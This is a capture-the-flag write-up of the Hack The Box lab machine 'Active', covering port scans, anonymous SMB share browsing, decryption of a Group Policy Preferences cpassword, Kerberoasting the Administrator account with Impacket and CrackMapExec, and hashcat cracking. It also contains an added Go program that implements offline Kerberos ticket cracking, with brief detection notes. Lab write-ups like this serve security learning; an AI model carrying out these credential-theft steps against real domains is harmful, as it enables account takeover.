
HTB/Windows

Active

haru0909 2023. 9. 17. 15:37

PWNED: 4 hours total

 

1. NMAP

$ nmap --script vuln -oA vuln -T4 10.129.69.12
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 11:57 KST
Stats: 0:01:55 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 96.10% done; ETC: 11:59 (0:00:04 remaining)
Nmap scan report for 10.129.69.12
Host is up (0.084s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49165/tcp open  unknown

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 136.88 seconds
$ nmap -sV -sC --top-ports 2000 --max-retries 2 -T5 -Pn -n -oA topports 10.129.69.12
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 12:13 KST
Warning: 10.129.69.12 giving up on port because retransmission cap hit (2).
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 63.16% done; ETC: 12:14 (0:00:09 remaining)
Nmap scan report for 10.129.69.12
Host is up (0.082s latency).
Not shown: 1743 closed tcp ports (conn-refused), 238 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-09-17 03:13:41Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -9s
| smb2-time:
|   date: 2023-09-17T03:14:40
|_  start_date: 2023-09-17T02:26:42
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled and required
// Same command, but I learned it can also be run this way, restricted to the ports already found.
$ nmap -Pn -n --open -p 53,88,135,138,389,445,3268 -sV -sC -oA tcpdetailed 10.129.69.12
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 12:26 KST
Nmap scan report for 10.129.69.12
Host is up (0.096s latency).
Not shown: 1 closed tcp port (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-09-17 03:26:04Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -10s
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled and required
| smb2-time:
|   date: 2023-09-17T03:26:11
|_  start_date: 2023-09-17T02:26:42

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.61 seconds

 

2. SMB Enum

$ smbmap -H 10.129.69.12
[+] IP: 10.129.69.12:445        Name: 10.129.69.12

        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share
        Users                                                   NO ACCESS
$ smbclient -N //10.129.69.12/Replication
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 19:37:44 2018
  ..                                  D        0  Sat Jul 21 19:37:44 2018
  active.htb                          D        0  Sat Jul 21 19:37:44 2018

                10459647 blocks of size 4096. 5203534 blocks available
smb: \> cd active.htb\
smb: \active.htb\> ls
  .                                   D        0  Sat Jul 21 19:37:44 2018
  ..                                  D        0  Sat Jul 21 19:37:44 2018
  DfsrPrivate                       DHS        0  Sat Jul 21 19:37:44 2018
  Policies                            D        0  Sat Jul 21 19:37:44 2018
  scripts                             D        0  Thu Jul 19 03:48:57 2018

                10459647 blocks of size 4096. 5203534 blocks available

smb: \active.htb\> cd Policies
smb: \active.htb\Policies\> ls
  .                                   D        0  Sat Jul 21 19:37:44 2018
  ..                                  D        0  Sat Jul 21 19:37:44 2018
  {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Sat Jul 21 19:37:44 2018
  {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Sat Jul 21 19:37:44 2018

                10459647 blocks of size 4096. 5203534 blocks available
smb: \active.htb\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
  .                                   D        0  Sat Jul 21 19:37:44 2018
  ..                                  D        0  Sat Jul 21 19:37:44 2018
  GPT.INI                             A       23  Thu Jul 19 05:46:06 2018
  Group Policy                        D        0  Sat Jul 21 19:37:44 2018
  MACHINE                             D        0  Sat Jul 21 19:37:44 2018
  USER                                D        0  Thu Jul 19 03:49:12 2018

                10459647 blocks of size 4096. 5203534 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> cd Preferences\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> ls
  .                                   D        0  Sat Jul 21 19:37:44 2018
  ..                                  D        0  Sat Jul 21 19:37:44 2018
  Groups                              D        0  Sat Jul 21 19:37:44 2018

                10459647 blocks of size 4096. 5203534 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> cd Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
  .                                   D        0  Sat Jul 21 19:37:44 2018
  ..                                  D        0  Sat Jul 21 19:37:44 2018
  Groups.xml                          A      533  Thu Jul 19 05:46:06 2018

                10459647 blocks of size 4096. 5203534 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.5 KiloBytes/sec) (average 4.5 KiloBytes/sec)


$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

 

GPP Decrypt

I needed to decrypt the cpassword, so I googled and found the GitHub repo below.
https://github.com/t0thkr1s/gpp-decrypt

A tool that parses Group Policy Preferences XML files, extracts the username and decrypts the cpassword attribute.

The cpassword in a GPP file is encrypted with a fixed AES-256 key that Microsoft published in its own documentation (the weakness addressed by MS14-025), so anyone who can read SYSVOL, or a replica of it like the Replication share here, can recover the plaintext without cracking anything.

$ git clone https://github.com/t0thkr1s/gpp-decrypt
$ cd gpp-decrypt
$ sudo python3 setup.py install
$ pip3 install pycryptodome   // important, I was stuck on an error for a long time because of this
// If it still fails: pip3 uninstall pycrypto crypto, then reinstall pycryptodome

$ python3 gpp-decrypt/gpp-decrypt.py -f Groups.xml


[ * ] Username: active.htb\SVC_TGS
[ * ] Password: GPPstillStandingStrong2k18

Password recovered in plaintext.

 

Kerberoasting

"A service principal name (SPN) is a unique identifier of a service instance.

SPNs are used by Kerberos authentication to associate a service instance with a service logon account." - MSDN

Any valid domain user can request a service ticket (ST) for any SPN registered in the domain.

The service ticket is encrypted with the key of the account that runs the service, so once the ticket is received, the password of that service account can be cracked offline from the ticket without ever touching the DC again.

 

1. Kerberoasting with GetUserSPNs.py from the Impacket suite

$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.129.69.12 -request

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-19 04:06:40.351723  2023-09-17 11:27:43.687337

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$cea499929257df6c2409286fa1b312e0$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

 

2. Kerberoasting with the CrackMapExec module
$ crackmapexec ldap [TARGET IP] -u 'username' -p 'password' --kdcHost [TARGET IP] --kerberoast output.txt

$ crackmapexec ldap 10.129.69.12  -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --kdcHost 10.129.69.12 --kerberoast output.txt
SMB         10.129.69.12    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
LDAP        10.129.69.12    389    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
LDAP        10.129.69.12    389    DC               [*] Total of records returned 1
CRITICAL:impacket:CCache file is not found. Skipping...
LDAP        10.129.69.12    389    DC               sAMAccountName: Administrator memberOf: CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb pwdLastSet: 2018-07-19 04:06:40.351723 lastLogon:2023-09-17 11:27:43.687337
LDAP        10.129.69.12    389    DC               $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f9415bb9ddfaf220c1df94b2838de058$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

 

HASHCAT

$krb5tgs$23$ (RC4-HMAC, etype 23) is hashcat mode 13100.

$ hashcat -m 13100 output.txt /usr/share/wordlists/rockyou.txt -o admin.txt --quiet
$ cat admin.txt
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f9415bb9ddfaf220c1df94b2838de058$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:Ticketmaster1968
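To make concrete what the Kerberoasting section describes and what hashcat mode 13100 actually checks, here is an added example (editor's code, not from the post, Impacket, CrackMapExec or hashcat) in Go using only the standard library. It builds a constructed RC4-HMAC (etype 23) ticket enc-part for a made-up service-account password, formats it as a $krb5tgs$23$ line, and cracks it the way hashcat does: for every candidate password, NT hash = MD4(UTF-16LE(password)), K1 = HMAC-MD5(NT, key usage 2), K3 = HMAC-MD5(K1, checksum), RC4-decrypt the edata, and accept the candidate when HMAC-MD5(K1, plaintext) equals the checksum. MD4 is implemented inline because Go's standard library lacks it. The confounder, the enc-part bytes and the three-word wordlist are constructed; the user, realm and SPN mirror the hash above, but the bytes are not the real ticket.

```go
package main

import (
	"crypto/hmac"
	"crypto/md5"
	"crypto/rc4"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"math/bits"
	"strings"
	"unicode/utf16"
)

// md4 implements RFC 1320 (Go's standard library has no MD4); the NT hash is MD4 over the UTF-16LE password.
func md4(data []byte) []byte {
	msg := append(append([]byte{}, data...), 0x80)
	msg = append(msg, make([]byte, (56-len(msg)%64+64)%64+8)...) // zero-pad to 56 mod 64, plus 8 bytes for the length
	binary.LittleEndian.PutUint64(msg[len(msg)-8:], uint64(len(data))*8)
	a, b, c, d := uint32(0x67452301), uint32(0xefcdab89), uint32(0x98badcfe), uint32(0x10325476)
	for off := 0; off < len(msg); off += 64 {
		x := func(k int) uint32 { return binary.LittleEndian.Uint32(msg[off+4*k:]) }
		aa, bb, cc, dd := a, b, c, d
		// Rounds 1-3 (F, G, H) each have their own word order, rotation amounts and additive constant.
		for r, order := range [3][16]int{{0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15},
			{0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15}, {0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15}} {
			for i, k := range order {
				f := [3]uint32{(b & c) | (^b & d), (b & c) | (b & d) | (c & d), b ^ c ^ d}[r]
				a = bits.RotateLeft32(a+f+x(k)+[3]uint32{0, 0x5a827999, 0x6ed9eba1}[r], [3][4]int{{3, 7, 11, 19}, {3, 5, 9, 13}, {3, 9, 11, 15}}[r][i%4])
				a, b, c, d = d, a, b, c
			}
		}
		a, b, c, d = a+aa, b+bb, c+cc, d+dd
	}
	out := make([]byte, 16)
	for i, v := range []uint32{a, b, c, d} {
		binary.LittleEndian.PutUint32(out[4*i:], v)
	}
	return out
}

// ntHash = MD4(UTF-16LE(password)): the RC4-HMAC (etype 23) long-term key of the service account.
func ntHash(password string) []byte {
	u := utf16.Encode([]rune(password))
	buf := make([]byte, 2*len(u))
	for i, v := range u {
		binary.LittleEndian.PutUint16(buf[2*i:], v)
	}
	return md4(buf)
}

func hmacMD5(key, msg []byte) []byte {
	m := hmac.New(md5.New, key)
	m.Write(msg)
	return m.Sum(nil)
}

var tgsUsage = []byte{2, 0, 0, 0} // key usage 2 (TGS-REP ticket enc-part, RFC 4120) as the little-endian T of RFC 4757

// rc4HmacEncrypt is the KDC side of RFC 4757: K1 = HMAC(K, T); checksum = HMAC(K1, conf||pt); edata = RC4(HMAC(K1, checksum), conf||pt).
func rc4HmacEncrypt(ntKey, confounder, plaintext []byte) (checksum, edata []byte) {
	k1 := hmacMD5(ntKey, tgsUsage)
	data := append(append([]byte{}, confounder...), plaintext...)
	checksum = hmacMD5(k1, data)
	c, _ := rc4.NewCipher(hmacMD5(k1, checksum))
	edata = make([]byte, len(data))
	c.XORKeyStream(edata, data)
	return checksum, edata
}

// crackKrb5tgs does what hashcat does in mode 13100: derive K1 and K3 from each candidate's NT hash, RC4-decrypt edata, accept if the checksum matches.
func crackKrb5tgs(line string, wordlist []string) (string, bool) {
	parts := strings.Split(line, "$") // "", krb5tgs, 23, *user, REALM, spn*, checksum, edata
	if len(parts) < 8 || parts[1] != "krb5tgs" || parts[2] != "23" {
		return "", false
	}
	checksum, err := hex.DecodeString(parts[len(parts)-2])
	edata, err2 := hex.DecodeString(parts[len(parts)-1])
	if err != nil || err2 != nil {
		return "", false
	}
	pt := make([]byte, len(edata))
	for _, cand := range wordlist {
		k1 := hmacMD5(ntHash(cand), tgsUsage)
		c, _ := rc4.NewCipher(hmacMD5(k1, checksum))
		c.XORKeyStream(pt, edata)
		if hmac.Equal(hmacMD5(k1, pt), checksum) {
			return cand, true
		}
	}
	return "", false
}

func main() {
	// Constructed ticket: fixed 8-byte confounder, fake enc-part, service-account password "Ticketmaster1968".
	cs, ed := rc4HmacEncrypt(ntHash("Ticketmaster1968"), []byte("confound"), []byte("constructed enc-part"))
	line := fmt.Sprintf("$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$%x$%x", cs, ed)
	fmt.Println(line)
	fmt.Println(crackKrb5tgs(line, []string{"password", "Summer2018", "Ticketmaster1968"}))
}
```

Two things follow from the code. Nothing in the loop contacts the KDC, which is why the attack is invisible to the DC once the ticket has been requested; the only server-side signal is the TGS request itself (event 4769 with encryption type 0x17). And the cost per guess is one MD4 plus three HMAC-MD5 and one RC4, which is why RC4 tickets crack so fast; accounts with AES-only keys (etype 17/18) force a PBKDF2-based derivation that is orders of magnitude slower per guess.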

 

Admin access

$ smbclient //10.129.69.12/Users -U administrator
Password for [WORKGROUP\administrator]:
Try "help" to get a list of possible commands.

smb: \Administrator\Desktop\> get root.txt
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

smb: \SVC_TGS\> get Desktop\user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as Desktop\user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
